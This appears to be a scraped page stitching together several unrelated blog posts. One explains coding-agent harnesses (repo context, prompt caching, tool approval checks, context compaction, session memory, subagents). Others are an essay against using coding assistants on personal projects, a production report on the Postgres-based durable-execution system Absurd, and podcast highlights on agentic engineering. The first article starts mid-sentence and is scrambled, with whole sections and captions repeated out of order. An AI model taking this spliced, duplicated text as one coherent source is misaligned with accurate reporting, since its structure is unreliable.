file, etc. It also has to provide arguments in a shape that the harness can check. So when the model asks to do something, the runtime can stop and run programmatic checks like “Is this a known tool?”, “Are the arguments valid?”, “Does this need user approval?” “Is the requested path even inside the workspace?” Only after those checks pass does anything actually run. While running coding agents, of course, carries some risk, the harness checks also improve reliability because the model doesn’t execute totally arbitrary commands. Also, besides rejecting malformed actions and approval gating, file access can be kept inside the repo by checking file paths. In a sense, the harness is giving the model less freedom, but it also improves the usability at the same time. Context bloat is not a unique problem of coding agents but an issue for LLMs in general. Sure, LLMs are supporting longer and longer contexts these days (and I recently wrote about the attention variants that make it computationally more feasible), but long contexts are still expensive and can also introduce additional noise (if there is a lot of irrelevant info). Coding agents are even more susceptible to context bloat than regular LLMs during multi-turn chats, because of repeated file reads, lengthy tool outputs, logs, etc. If the runtime keeps all of that at full fidelity, it will run out of available context tokens pretty quickly. So, a good coding harness is usually pretty sophisticated about handling context bloat beyond just cutting our summarizing information like regular chat UIs. Conceptually, the context compaction in coding agents might work as summarized in the figure below. Specifically, we are zooming a bit further into the clip (step 6) part of Figure 8 in the previous section. Figure 10: Large outputs are clipped, older reads are deduplicated, and the transcript is compressed before it goes back into the prompt. A minimal harness uses at least two compaction strategies to manage that problem. The first is clipping, which shortens long document snippets, large tool outputs, memory notes, and transcript entries. In other words, it prevents any one piece of text from taking over the prompt budget just because it happened to be verbose. The second strategy is transcript reduction or summarization, which turns the full session history (more on that in the next section) into a smaller promptable summary. A key trick here is to keep recent events richer because they are more likely to matter for the current step. And we compress older events more aggressively because they are likely less relevant. Additionally, we also deduplicate older file reads so the model does not keep seeing the same file content over and over again just because it was read multiple times earlier in the session. Overall, I think this is one of the underrated, boring parts of good coding-agent design. A lot of apparent “model quality” is really context quality. In practice, all these 6 core concepts covered here are highly intertwined, and the different sections and figures cover them with different focuses or zoom levels. In the previous section, we covered prompt-time use of history and how we build a compact transcript. The question there is: how much of the past should go back into the model on the next turn? So the emphasis is compression, clipping, deduplication, and recency. Now, this section, structured session memory, is about the storage-time structure of history. The question here is: what does the agent keep over time as a permanent record? So the emphasis is that the runtime keeps a fuller transcript as a durable state, alongside a lighter memory layer that is smaller and gets modified and compacted rather than just appended to. To summarize, a coding agent separates state into (at least) two layers: working memory: the small, distilled state the agent keeps explicitly a full transcript: this covers all the user requests, tool outputs, and LLM responses Figure 11: New events get appended to a full transcript and summarized in a working memory. The session files on disk are usually stored as JSON files. The figure above illustrates the two main session files, the full transcript and the working memory, that usually get stored as JSON files on disk. As mentioned before, the full transcript stores the whole history, and it’s resumable if we close the agent. The working memory is more of a distilled version with the currently most important info, which is somewhat related to the compact transcript. But the compact transcript and working memory have slightly different jobs. The compact transcript is for prompt reconstruction. Its job is to give the model a compressed view of recent history so it can continue the conversation without seeing the full transcript every turn. The working memory is more meant for task continuity. Its job is to keep a small, explicitly maintained summary of what matters across turns, things like the current task, important files, and recent notes. Following step 4 in the figure above, the latest user request, together with the LLM response and tool output, would then be recorded as a “new event” in both the full transcript and working memory, in the next round, which is not shown to reduce clutter in the figure above. Once an agent has tools and state, one of the next useful capabilities is delegation. The reason is that it allows us to parallelize certain work into subtasks via subagents and speed up the main task. For example, the main agent may be in the middle of one task and still need a side answer, for example, which file defines a symbol, what a config says, or why a test is failing. It is useful to split that off into a bounded subtask instead of forcing one loop to carry every thread of work at once. (In my mini coding agent, the implementation is simpler, and the child still runs synchronously, but the underlying idea is the same.) A subagent is only useful if it inherits enough context to do real work. But if we don’t restrict it, we now have multiple agents duplicating work, touching the same files, or spawning more subagents, and so on. So the tricky design problem is not just how to spawn a subagent but also how to bind one :). Figure 12: The subagent inherits enough context to be useful, but it runs inside tighter boundaries than the main agent. The trick here is that the subagent inherits enough context to be useful, but also has it constrained (for example, read-only and restricted in recursion depth) Claude Code has supported subagents for a long time, and Codex added them more recently. Codex does not generally force subagents into read-only mode. Instead, they usually inherit much of the main agent’s sandbox and approval setup. So, the boundary is more about task scoping, context, and depth. The section above tried to cover the main components of coding agents. As mentioned before, they are more or less deeply intertwined in their implementation. However, I hope that covering them one by one helps with the overall mental model of how coding harnesses work, and why they can make the LLM more useful compared to simple multi-turn chats. Figure 13: Six main features of a coding harness discussed in previous sections. If you are interested in seeing these implemented in clean, minimalist Python code, you may like my Mini Coding Agent . OpenClaw may be an interesting comparison, but it is not quite the same kind of system. OpenClaw is more like a local, general agent platform that can also code, rather than being a specialized (terminal) coding assistant. There are still several overlaps with a coding harness: it uses prompt and instruction files in the workspace, such as AGENTS.md, SOUL.md, and TOOLS.md it keeps JSONL session files and includes transcript compaction and session management it can spawn helper sessions and subagents However, as mentioned above, the emphasis is different. Coding agents are optimized for a person working in a repository and asking a coding assistant to inspect files, edit code, and run local tools efficiently. OpenClaw is more optimized for running many long-lived local agents across chats, channels, and workspaces, with coding as one important workload among several others. I am excited to share that I finished writing Build A Reasoning Model (From Scratch) and all chapters are in early access yet. The publisher is currently working on the layouts, and it should be available this summer. This is probably my most ambitious book so far. I spent about 1.5 years writing it, and a large number of experiments went into it. It is also probably the book I worked hardest on in terms of time, effort, and polish, and I hope you’ll enjoy it. Build a Reasoning Model (From Scratch) on Manning and Amazon . The main topics are evaluating reasoning models inference-time scaling self-refinement reinforcement learning distillation There is a lot of discussion around “reasoning” in LLMs, and I think the best way to understand what it really means in the context of LLMs is to implement one from scratch! Amazon (pre-order) Manning (complete book in early access , pre-final layout, 528 pages) Figure 1: Claude Code CLI, Codex CLI, and my Mini Coding Agent . Coding agents are engineered for software work where the notable parts are not only the model choice but the surrounding system, including repo context, tool design, prompt-cache stability, memory, and long-session continuity. That distinction matters because when we talk about the coding capabilities of LLMs, people often collapse the model, the reasoning behavior, and the agent product into one thing. But before getting into the coding agent specifics, let me briefly provide a bit more context on the difference between the broader concepts, the LLMs, reasoning models, and agents. On The Relationship Between LLMs, Reasoning Models, and Agents An LLM is the core next-token model. A reasoning model is still an LLM, but usually one that was trained and/or prompted to spend more inference-time compute on intermediate reasoning, verification, or search over candidate answers. An agent is a layer on top, which can be understood as a control loop around the model. Typically, given a goal, the agent layer (or harness) decides what to inspect next, which tools to call, how to update its state, and when to stop, etc. Roughly, we can think about the relationship as this: the LLM is the engine, a reasoning model is a beefed-up engine (more powerful, but more expensive to use), and an agent harness helps us the model. The analogy is not perfect, because we can also use conventional and reasoning LLMs as standalone models (in a chat UI or Python session), but I hope it conveys the main point. Figure 2: The relationship between conventional LLM, reasoning LLM (or reasoning model), and an LLM wrapped in an agent harness. In other words, the agent is the system that repeatedly calls the model inside an environment. So, in short, we can summarize it like this: LLM: the raw model Reasoning model : an LLM optimized to output intermediate reasoning traces and to verify itself more Agent: a loop that uses a model plus tools, memory, and environment feedback Agent harness: the software scaffold around an agent that manages context, tool use, prompts, state, and control flow Coding harness: a special case of an agent harness; i.e., a task-specific harness for software engineering that manages code context, tools, execution, and iterative feedback Figure 3. A coding harness combines three layers: the model family, an agent loop, and runtime supports. The model provides the “engine”, the agent loop drives iterative problem solving, and the runtime supports provide the plumbing. Within the loop, “observe” collects information from the environment, “inspect” analyzes that information, “choose” selects the next step, and “act” executes it. The takeaway here is that a good coding harness can make a reasoning and a non-reasoning model feel much stronger than it does in a plain chat box, because it helps with context management and more. The Coding Harness As mentioned in the previous section, when we say harness , we typically mean the software layer around the model that assembles prompts, exposes tools, tracks file state, applies edits, runs commands, manages permissions, caches stable prefixes, stores memory, and many more. Today, when using LLMs, this layer shapes most of the user experience compared to prompting the model directly or using web chat UI (which is closer to “chat with uploaded files”). Since, in my view, the vanilla versions of LLMs nowadays have very similar capabilities (e.g., the vanilla versions of GPT-5.4, Opus 4.6, and GLM-5 or so), the harness can often be the distinguishing factor that makes one LLM work better than another. This is speculative, but I suspect that if we dropped one of the latest, most capable open-weight LLMs, such as GLM-5, into a similar harness, it could likely perform on par with GPT-5.4 in Codex or Claude Opus 4.6 in Claude Code. That said, some harness-specific post-training is usually beneficial. For example, OpenAI historically maintained separate GPT-5.3 and GPT-5.3-Codex variants. In the next section, I want to go more into the specifics and discuss the core components of a coding harness using my Mini Coding Agent : https://github.com/rasbt/mini-coding-agent . Figure 4: Main harness features of a coding agent / coding harness that will be discussed in the following sections. By the way, in this article, I use the terms “coding agent” and “coding harness” somewhat interchangeably for simplicity. (Strictly speaking, the agent is the model-driven decision-making loop, while the harness is the surrounding software scaffold that provides context, tools, and execution support.) Figure 5: Minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python) Anyways, below are six main components of coding agents. You can check out the source code of my minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python), for more concrete code examples. The code annotates the six components discussed below via code comments: 1. Live Repo Context This is maybe the most obvious component, but it is also one of the most important ones. When a user says “fix the tests” or “implement xyz,” the model should know whether it is inside a Git repo, what branch it is on, which project documents might contain instructions, and so on. That’s because those details often change or affect what the correct action is. For example, “Fix the tests” is not a self-contained instruction. If the agent sees AGENTS.md or a project README, it may learn which test command to run, etc. If it knows the repo root and layout, it can look in the right places instead of guessing. Also, the git branch, status, and commits can help provide more context about what changes are currently in progress and where to focus. Figure 6: The agent harness first builds a small workspace summary that gets combined with the user request for additional project context. The takeaway is that the coding agent collects info (”stable facts” as a workspace summary) upfront before doing any work, so that it’s is not starting from zero, without context, on every prompt. 2. Prompt Shape And Cache Reuse Once the agent has a repo view, the next question is how to feed that information to the model. The previous figure showed a simplified view of this (“Combined prompt: prefix + request”), but in practice, it would be relatively wasteful to combine and re-process the workspace summary on every user query. I.e., coding sessions are repetitive, and the agent rules usually stay the same. The tool descriptions usually stay the same, too. And even the workspace summary usually stays (mostly) the same. The main changes are usually the latest user request, the recent transcript, and maybe the short-term memory. “Smart” runtimes don’t rebuild everything as one giant undifferentiated prompt on every turn, as illustrated in the figure below. Figure 7: The agent harness builds a stable prompt prefix, adds the changing session state, and then feeds that combined prompt to the model. The main difference from section 1 is that section 1 was about gathering repo facts. Here, we are now interested in packaging and caching those facts efficiently for repeated model calls. The “stable” “Stable prompt prefix” means that the information contained there doesn’t change too much. It usually contains the general instructions, tool descriptions, and the workspace summary. We don’t want to waste compute on rebuilding it from scratch in each interaction if nothing important has changed. The other components are updated more frequently (usually each turn). This includes short-term memory, the recent transcript, and the newest user request. In short, the caching aspect for the “Stable prompt prefix” is simply that a smart runtime tries to reuse that part. 3. Tool Access and Use Tool access and tool use are where it starts to feel less like chat and more like an agent. A plain model can suggest commands in prose, but an LLM in a coding harness should do something narrower and more useful and be actually able to execute the command and retrieve the results (versus us calling the command manually and pasting the results back into the chat). But instead of letting the model improvise arbitrary syntax, the harness usually provides a pre-defined list of allowed and named tools with clear inputs and clear boundaries. (But of course, something like Python can be part of this so that the agent could also execute an arbitrary wide list of shell commands.) The tool-use flow is illustrated in the figure below. Figure 8: The model emits a structured action, the harness validates it, optionally asks for approval, executes it, and feeds the bounded result back into the loop. To illustrate this, below is an example of how this usually looks to the user using my Mini Coding Agent. (This is not as pretty as Claude Code or Codex because it is very minimal and uses plain Python without any external dependencies.) Figure 9: Illustration of a tool call approval request in the Mini Coding Agent. Here, the model has to choose an action that the harness recognizes, like list files, read a file, search, run a shell command, write a file, etc. It also has to provide arguments in a shape that the harness can check. So when the model asks to do something, the runtime can stop and run programmatic checks like “Is this a known tool?”, “Are the arguments valid?”, “Does this need user approval?” “Is the requested path even inside the workspace?” Figure 10: Large outputs are clipped, older reads are deduplicated, and the transcript is compressed before it goes back into the prompt. A minimal harness uses at least two compaction strategies to manage that problem. The first is clipping, which shortens long document snippets, large tool outputs, memory notes, and transcript entries. In other words, it prevents any one piece of text from taking over the prompt budget just because it happened to be verbose. The second strategy is transcript reduction or summarization, which turns the full session history (more on that in the next section) into a smaller promptable summary. A key trick here is to keep recent events richer because they are more likely to matter for the current step. And we compress older events more aggressively because they are likely less relevant. Additionally, we also deduplicate older file reads so the model does not keep seeing the same file content over and over again just because it was read multiple times earlier in the session. Overall, I think this is one of the underrated, boring parts of good coding-agent design. A lot of apparent “model quality” is really context quality. 5. Structured Session Memory In practice, all these 6 core concepts covered here are highly intertwined, and the different sections and figures cover them with different focuses or zoom levels. In the previous section, we covered prompt-time use of history and how we build a compact transcript. The question there is: how much of the past should go back into the model on the next turn? So the emphasis is compression, clipping, deduplication, and recency. Now, this section, structured session memory, is about the storage-time structure of history. The question here is: what does the agent keep over time as a permanent record? So the emphasis is that the runtime keeps a fuller transcript as a durable state, alongside a lighter memory layer that is smaller and gets modified and compacted rather than just appended to. To summarize, a coding agent separates state into (at least) two layers: working memory: the small, distilled state the agent keeps explicitly a full transcript: this covers all the user requests, tool outputs, and LLM responses Figure 11: New events get appended to a full transcript and summarized in a working memory. The session files on disk are usually stored as JSON files. The figure above illustrates the two main session files, the full transcript and the working memory, that usually get stored as JSON files on disk. As mentioned before, the full transcript stores the whole history, and it’s resumable if we close the agent. The working memory is more of a distilled version with the currently most important info, which is somewhat related to the compact transcript. But the compact transcript and working memory have slightly different jobs. The compact transcript is for prompt reconstruction. Its job is to give the model a compressed view of recent history so it can continue the conversation without seeing the full transcript every turn. The working memory is more meant for task continuity. Its job is to keep a small, explicitly maintained summary of what matters across turns, things like the current task, important files, and recent notes. Following step 4 in the figure above, the latest user request, together with the LLM response and tool output, would then be recorded as a “new event” in both the full transcript and working memory, in the next round, which is not shown to reduce clutter in the figure above. 6. Delegation With (Bounded) Subagents Once an agent has tools and state, one of the next useful capabilities is delegation. The reason is that it allows us to parallelize certain work into subtasks via subagents and speed up the main task. For example, the main agent may be in the middle of one task and still need a side answer, for example, which file defines a symbol, what a config says, or why a test is failing. It is useful to split that off into a bounded subtask instead of forcing one loop to carry every thread of work at once. (In my mini coding agent, the implementation is simpler, and the child still runs synchronously, but the underlying idea is the same.) A subagent is only useful if it inherits enough context to do real work. But if we don’t restrict it, we now have multiple agents duplicating work, touching the same files, or spawning more subagents, and so on. So the tricky design problem is not just how to spawn a subagent but also how to bind one :). Figure 12: The subagent inherits enough context to be useful, but it runs inside tighter boundaries than the main agent. The trick here is that the subagent inherits enough context to be useful, but also has it constrained (for example, read-only and restricted in recursion depth) Claude Code has supported subagents for a long time, and Codex added them more recently. Codex does not generally force subagents into read-only mode. Instead, they usually inherit much of the main agent’s sandbox and approval setup. So, the boundary is more about task scoping, context, and depth. Components Summary The section above tried to cover the main components of coding agents. As mentioned before, they are more or less deeply intertwined in their implementation. However, I hope that covering them one by one helps with the overall mental model of how coding harnesses work, and why they can make the LLM more useful compared to simple multi-turn chats. Figure 13: Six main features of a coding harness discussed in previous sections. If you are interested in seeing these implemented in clean, minimalist Python code, you may like my Mini Coding Agent . How Does This Compare To OpenClaw? OpenClaw may be an interesting comparison, but it is not quite the same kind of system. OpenClaw is more like a local, general agent platform that can also code, rather than being a specialized (terminal) coding assistant. There are still several overlaps with a coding harness: it uses prompt and instruction files in the workspace, such as AGENTS.md, SOUL.md, and TOOLS.md it keeps JSONL session files and includes transcript compaction and session management it can spawn helper sessions and subagents Build a Reasoning Model (From Scratch) on Manning and Amazon . The main topics are evaluating reasoning models inference-time scaling self-refinement reinforcement learning distillation Amazon (pre-order) Manning (complete book in early access , pre-final layout, 528 pages)

0 views
Ankur Sethi 1 weeks ago

I'm no longer using coding assistants on personal projects

I’ve spent the last few months figuring out how best to use LLMs to build software. In January and February, I used Claude Code to build a little programming language in C. In December I used local a local LLM to analyze all the journal entries I wrote in 2025 , and then used Gemini to write scripts that could visualize that data. Besides what I’ve written about publicly, I’ve also used Claude Code to: I won’t lie, I started off skeptical about the ability of LLMs to write code, but I can’t deny the fact that, in 2026, they can produce code that’s as good or better than a junior-to-intermediate developer for most programming domains. If you’re abstaining from learning about or using LLMs in your own work, you’re doing a disservice to yourself and your career. It’s a very real possibility that in five years, most of the code we write will be produced using an LLM. It’s not a certainty, but it’s a strong possibility. However, I’m not going to stop writing code by hand. Not anytime soon. As long as there are computers to program, I will be programming them using my own two fleshy human hands. I started programming computers because I enjoy the act of programming. I enjoy thinking through problems, coming up with solutions, evolving those solutions so that they are as correct and clear as possible, and then putting them out into the world where they can be of use to people. It’s a fun and fulfilling profession. Some people see the need for writing code as an impediment to getting good use out of a computer. In fact, some of the most avid fans of generative AI believe that the act of actually doing the work is a punishment. They see work as unnecesary friction that must be optimized away. Truth is, the friction inherent in doing any kind of work—writing, programming, making music, painting, or any other creative activity generative AI purpots to replace—is the whole point. The artifacts you produce as the result of your hard work are not important. They are incidental. The work itself is the point. When you do the work, you change and grow and become more yourself. Work—especially creative work—is an act of self-love if you choose to see it that way. Besides, when you rely on generative AI to do the work, you miss out on the pleasurable sensations of being in flow state. Your skills atrophy (no, writing good prompts is not a skill, any idiot can do it). Your brain gets saturated with dopamine in the same way when you gamble, doomscroll, or play a gatcha game. Using Claude Code as your main method of producing code is like scrolling TikTok eight hours a day, every day, for work. And the worst part? The code you produce using LLMs is pure cognitive debt. You have no idea what it’s doing, only that it seems to be doing what you want it to do. You don’t have a mental model for how it works, and you can’t fix it if it breaks in production. Such a codebase is not an asset but a liability. I predict that in 1-3 years we’re going see organizations rewrite their LLM-generated software using actual human programmers. Personally, I’ve stopped using generative AI to write code for my personal projects. I still use Claude Code as a souped up search engine to look up information, or to help me debug nasty errors. But I’m manually typing every single line of code in my current Django project, with my own fingers, using a real physical keyboard. I’m even thinking up all the code using my own brain. Miraculous! For the commercial projects I work on for my clients, I’m going to follow whatever the norms around LLM use happen to at my workplace. If a client requires me to use Claude Code to write every single line of code, I’ll be happy to oblige. If they ban LLMs outright, I’m fine with that too. After spending hundreds of hours yelling at Claude, I’m dangerously proficient at getting it to do the right thing. But I haven’t lost my programming skills yet, and I don’t plan to. I’m flexible. Given the freedom to choose, I’d probably pick a middle path: use LLMs to generate boilerplate code, write tricky test cases, debug nasty issues I can’t think of, and quickly prototype ideas to test. I’m not an AI vegan. But when it comes to code I write for myself—which includes the code that runs this website—I’m going to continue writing it myself, line by line, like I always did. Somebody has to clean up after the robots when they make a mess, right? Write and debug Emacs Lisp for my personal Emacs configuration. Write several Alfred workflows (in Bash, AppleScript, and Swift) to automate tasks on my computer. Debug CSS issues on this very website. Generate React components for a couple of throwaway side projects. Generate Django apps for a couple of throwaway side projects. Port color themes between text editors. A lot more that I’m forgetting now.

0 views
Armin Ronacher 1 weeks ago

Absurd In Production

About five months ago I wrote about Absurd , a durable execution system we built for our own use at Earendil, sitting entirely on top of Postgres and Postgres alone. The pitch was simple: you don’t need a separate service , a compiler plugin , or an entire runtime to get durable workflows. You need a SQL file and a thin SDK. Since then we’ve been running it in production, and I figured it’s worth sharing what the experience has been like. The short version: the design held up, the system has been a pleasure to work with, and other people seem to agree. Absurd is a durable execution system that lives entirely inside Postgres. The core is a single SQL file ( absurd.sql ) that defines stored procedures for task management, checkpoint storage, event handling, and claim-based scheduling. On top of that sit thin SDKs (currently TypeScript , Python and an experimental Go one) that make the system ergonomic in your language of choice. The model is straightforward: you register tasks, decompose them into steps, and each step acts as a checkpoint. If anything fails, the task retries from the last completed step. Tasks can sleep, wait for external events, and suspend for days or weeks. All state lives in Postgres. If you want the full introduction, the original blog post covers the fundamentals. What follows here is what we’ve learned since. The project got multiple releases over the last five months. Most of the changes are things you’d expect from a system that people actually started depending on: hardened claim handling, watchdogs that terminate broken workers, deadlock prevention, proper lease management, event race conditions, and all the edge cases that only show up when you’re running real workloads. A few things worth calling out specifically. Decomposed steps. The original design only had , where you pass in a function and get back its checkpointed result. That works well for many cases but not all. Sometimes you need to know whether a step already ran before deciding what to do next. So we added / , which give you a handle you can inspect before committing the result. This turned out to be very useful for modeling intentional failures and conditional logic. This in particular is necessary when working with “before call” and “after call” type hook APIs. Task results. You can now spawn a task, go do other things, and later come back to fetch or await its result. This sounds obvious in hindsight, but the original system was purely fire-and-forget. Having proper result inspection made it possible to use Absurd for things like spawning child tasks from within a parent workflow and waiting for them to finish. This is particularly useful for debugging with agents too. absurdctl . We built this out as a proper CLI tool. You can initialize schemas, run migrations, create queues, spawn tasks, emit events, retry failures from the command line. It’s installable via or as a standalone binary. This has been invaluable for debugging production issues. When something is stuck, being able to just and see exactly where it stopped is a very different experience from digging through logs. Habitat . A small Go application that serves up a web dashboard for monitoring tasks, runs, checkpoints, and events. It connects directly to Postgres and gives you a live view of what’s happening. It’s simple, but it’s the kind of thing that makes the system more enjoyable for humans. Agent integration. Since Absurd was originally built for agent workloads, we added a bundled skill that coding agents can discover and use to debug workflow state via . There’s also a documented pattern for making pi agent turns durable by logging each message as a checkpoint. The thing I’m most pleased about is that the core design didn’t need to change all that much. The fundamental model of tasks, steps, checkpoints, events, and suspending is still exactly what it was initially. We added features around it, but nothing forced us to rethink the basic abstractions. Putting the complexity in SQL and keeping the SDKs thin turned out to be a genuinely good call. The TypeScript SDK is about 1,400 lines. The Python SDK is about 1,900 but most of this comes from the complexity of supporting colored functions. Compare that to Temporal’s Python SDK at around 170,000 lines. It means the SDKs are easy to understand, easy to debug, and easy to port. When something goes wrong, you can read the entire SDK in an afternoon and understand what it does. The checkpoint-based replay model also aged well. Unlike systems that require deterministic replay of your entire workflow function, Absurd just loads the cached step results and skips over completed work. That means your code doesn’t need to be deterministic outside of steps. You can call or in between steps and things still work, because only the step boundaries matter. In practice, this makes it much easier to reason about what’s safe and what isn’t. Pull-based scheduling was the right choice too. Workers pull tasks from Postgres as they have capacity. There’s no coordinator, no push mechanism, no HTTP callbacks. That makes it trivially self-hostable and means you don’t have to think about load management at the infrastructure level. I had some discussions with folks about whether the right abstraction should have been a durable promise . It’s a very appealing idea, but it turns out to be much more complex to implement in practice. It’s however in theory also more powerful. I did make some attempts to see what absurd would look like if it was based on durable promises but so far did not get anywhere with it. It’s however an experiment that I think would be fun to try! The primary use case is still agent workflows. An agent is essentially a loop that calls an LLM, processes tool results, and repeats until it decides it’s done. Each iteration becomes a step, and each step’s result is checkpointed. If the process dies on iteration 7, it restarts and replays iterations 1 through 6 from the store, then continues from 7. But we’ve found it useful for a lot of other things too. All our crons just dispatch distributed workflows with a pre-generated deduplication key from the invocation. We can have two cron processes running and they will only trigger one absurd task invocation. We also use it for background processing that needs to survive deploys. Basically anything where you’d otherwise build your own retry-and-resume logic on top of a queue. Absurd is deliberately minimal, but there are things I’d like to see. There’s no built-in scheduler. If you want cron-like behavior, you run your own scheduler loop and use idempotency keys to deduplicate. That works, and we have a documented pattern for it , but it would be nice to have something more integrated. There’s no push model. Everything is pull. If you need an HTTP endpoint to receive webhooks and wake up tasks, you build that yourself. I think that’s the right default as push systems are harder to operate and easier to overwhelm but there are cases where it would be convenient. In particular there are quite a few agentic systems where it would be super nice to have webhooks natively integrated (wake on incoming POST request). I definitely don’t want to have this in the core, but that sounds like the kind of problem that could be a nice adjacent library that builds on top of absurd. The biggest omission is that it does not support partitioning yet. That’s unfortunate because it makes cleaning up data more expensive than it has to be. In theory supporting partitions would be pretty simple. You could have weekly partitions and then detach and delete them when they expire. The only thing that really stands in the way of that is that Postgres does not have a convenient way of actually doing that. The hard part is not partitioning itself, it’s partition lifecycle management under real workloads. If a worker inserts a row whose lands in a month without a partition, the insert fails and the workflow crashes. So you need a separate maintenance loop that always creates future partitions far enough ahead for sleeps/retries, and does that for every queue. On the delete side, the safe approach is , but getting that to run from doesn’t work because it cannot be run within a transaction, but runs everything in one. I don’t think it’s an unsolvable problem, but it’s one I have not found a good solution for and I would love to get input on . This brings me a bit to a meta point on the whole thing which is what the point of Open Source libraries in the age of agentic engineering is. Durable Execution is now something that plenty of startups sell you. On the other hand it’s also something that an agent would build you and people might not even look for solutions any more. It’s kind of … weird? I don’t think a durable execution library can support a company, I really don’t. On the other hand I think it’s just complex enough of a problem that it could be a good Open Source project void of commercial interests. You do need a bit of an ecosystem around it, particularly for UI and good DX for debugging, and that’s hard to get from a throwaway implementation. I don’t think we have squared this yet, but it’s already much better to use than a few months ago. If you’re using Absurd, thinking about it, or building adjacent ideas, I’d love your feedback. Bug reports, rough edges, design critiques, and contributions are all very welcome—this project has gotten better every time someone poked at it from a different angle.

0 views
Simon Willison 1 weeks ago

Highlights from my conversation about agentic engineering on Lenny's Podcast

I was a guest on Lenny Rachitsky's podcast, in a new episode titled An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines . It's available on YouTube , Spotify , and Apple Podcasts . Here are my highlights from our conversation, with relevant links. 4:19 - The end result of these two labs throwing everything they had at making their models better at code is that in November we had what I call the inflection point where GPT 5.1 and Claude Opus 4.5 came along. They were both incrementally better than the previous models, but in a way that crossed a threshold where previously the code would mostly work, but you had to pay very close attention to it. And suddenly we went from that to... almost all of the time it does what you told it to do, which makes all of the difference in the world. Now you can spin up a coding agent and say, build me a Mac application that does this thing , and you'll get something back which won't just be a buggy pile of rubbish that doesn't do anything. 5:49 - I can churn out 10,000 lines of code in a day. And most of it works. Is that good? Like, how do we get from most of it works to all of it works? There are so many new questions that we're facing, which I think makes us a bellwether for other information workers. Code is easier than almost every other problem that you pose these agents because code is obviously right or wrong - either it works or it doesn't work. There might be a few subtle hidden bugs, but generally you can tell if the thing actually works. If it writes you an essay, if it prepares a lawsuit for you, it's so much harder to derive if it's actually done a good job, and to figure out if it got things right or wrong. But it's happening to us as software engineers. It came for us first. And we're figuring out, OK, what do our careers look like? How do we work as teams when part of what we did that used to take most of the time doesn't take most of the time anymore? What does that look like? And it's going to be very interesting seeing how this rolls out to other information work in the future. Lawyers are falling for this really badly. The AI hallucination cases database is up to 1,228 cases now! Plus this bit from the cold open at the start : It used to be you'd ask ChatGPT for some code, and it would spit out some code, and you'd have to run it and test it. The coding agents take that step for you now. And an open question for me is how many other knowledge work fields are actually prone to these agent loops? 8:19 - I write so much of my code on my phone. It's wild. I can get good work done walking the dog along the beach, which is delightful. I mainly use the Claude iPhone app for this, both with a regular Claude chat session (which can execute code now ) or using it to control Claude Code for web . 9:55 If you're vibe coding something for yourself, where the only person who gets hurt if it has bugs is you, go wild. That's completely fine. The moment you ship your vibe coding code for other people to use, where your bugs might actually harm somebody else, that's when you need to take a step back. See also When is it OK to vibe code? 12:49 The reason it's called the dark factory is there's this idea in factory automation that if your factory is so automated that you don't need any people there, you can turn the lights off. Like the machines can operate in complete darkness if you don't need people on the factory floor. What does that look like for software? [...] So there's this policy that nobody writes any code: you cannot type code into a computer. And honestly, six months ago, I thought that was crazy. And today, probably 95% of the code that I produce, I didn't type myself. That world is practical already because the latest models are good enough that you can tell them to rename that variable and refactor and add this line there... and they'll just do it - it's faster than you typing on the keyboard yourself. The next rule though, is nobody reads the code. And this is the thing which StrongDM started doing last year. I wrote a lot more about StrongDM's dark factory explorations back in February. 21:27 - It used to be, you'd come up with a spec and you hand it to your engineering team. And three weeks later, if you're lucky, they'd come back with an implementation. And now that maybe takes three hours, depending on how well the coding agents are established for that kind of thing. So now what, right? Now, where else are the bottlenecks? Anyone who's done any product work knows that your initial ideas are always wrong. What matters is proving them, and testing them. We can test things so much faster now because we can build workable prototypes so much quicker. So there's an interesting thing I've been doing in my own work where any feature that I want to design, I'll often prototype three different ways it could work because that takes very little time. I've always loved prototyping things, and prototyping is even more valuable now. 22:40 - A UI prototype is free now. ChatGPT and Claude will just build you a very convincing UI for anything that you describe. And that's how you should be working. I think anyone who's doing product design and isn't vibe coding little prototypes is missing out on the most powerful boost that we get in that step. But then what do you do? Given your three options that you have instead of one option, how do you prove to yourself which one of those is the best? I don't have a confident answer to that. I expect this is where the good old fashioned usability testing comes in. More on prototyping later on: 46:35 - Throughout my entire career, my superpower has been prototyping. I've been very quick at knocking out working prototypes of things. I'm the person who can show up at a meeting and say, look, here's how it could work. And that was kind of my unique selling point. And that's gone. Anyone can do what I could do. 26:25 - I'm finding that using coding agents well is taking every inch of my 25 years of experience as a software engineer, and it is mentally exhausting. I can fire up four agents in parallel and have them work on four different problems. And by like 11 AM, I am wiped out for the day. [...] There's a personal skill we have to learn in finding our new limits - what's a responsible way for us not to burn out. I've talked to a lot of people who are losing sleep because they're like, my coding agents could be doing work for me. I'm just going to stay up an extra half hour and set off a bunch of extra things... and then waking up at four in the morning. That's obviously unsustainable. [...] There's an element of sort of gambling and addiction to how we're using some of these tools. 45:16 - People talk about how important it is not to interrupt your coders. Your coders need to have solid two to four hour blocks of uninterrupted work so they can spin up their mental model and churn out the code. That's changed completely. My programming work, I need two minutes every now and then to prompt my agent about what to do next. And then I can do the other stuff and I can go back. I'm much more interruptible than I used to be. 28:19 - I've got 25 years of experience in how long it takes to build something. And that's all completely gone - it doesn't work anymore because I can look at a problem and say that this is going to take two weeks, so it's not worth it. And now it's like... maybe it's going to take 20 minutes because the reason it would have taken two weeks was all of the sort of crufty coding things that the AI is now covering for us. I constantly throw tasks at AI that I don't think it'll be able to do because every now and then it does it. And when it doesn't do it, you learn, right? But when it does do something, especially something that the previous models couldn't do, that's actually cutting edge AI research. And a related anecdote: 36:56 - A lot of my friends have been talking about how they have this backlog of side projects, right? For the last 10, 15 years, they've got projects they never quite finished. And some of them are like, well, I've done them all now. Last couple of months, I just went through and every evening I'm like, let's take that project and finish it. And they almost feel a sort of sense of loss at the end where they're like, well, okay, my backlog's gone. Now what am I going to build? 29:29 - So ThoughtWorks, the big IT consultancy, did an offsite about a month ago , and they got a whole bunch of engineering VPs in from different companies to talk about this stuff. And one of the interesting theories they came up with is they think this stuff is really good for experienced engineers, like it amplifies their skills. It's really good for new engineers because it solves so many of those onboarding problems. The problem is the people in the middle. If you're mid-career, if you haven't made it to sort of super senior engineer yet, but you're not sort of new either, that's the group which is probably in the most trouble right now. I mentioned Cloudflare hiring 1,000 interns , and Shopify too. Lenny asked for my advice for people stuck in that middle: 31:21 - That's a big responsibility you're putting on me there! I think the way forward is to lean into this stuff and figure out how do I help this make me better? A lot of people worry about skill atrophy: if the AI is doing it for you, you're not learning anything. I think if you're worried about that, you push back at it. You have to be mindful about how you're applying the technology and think, 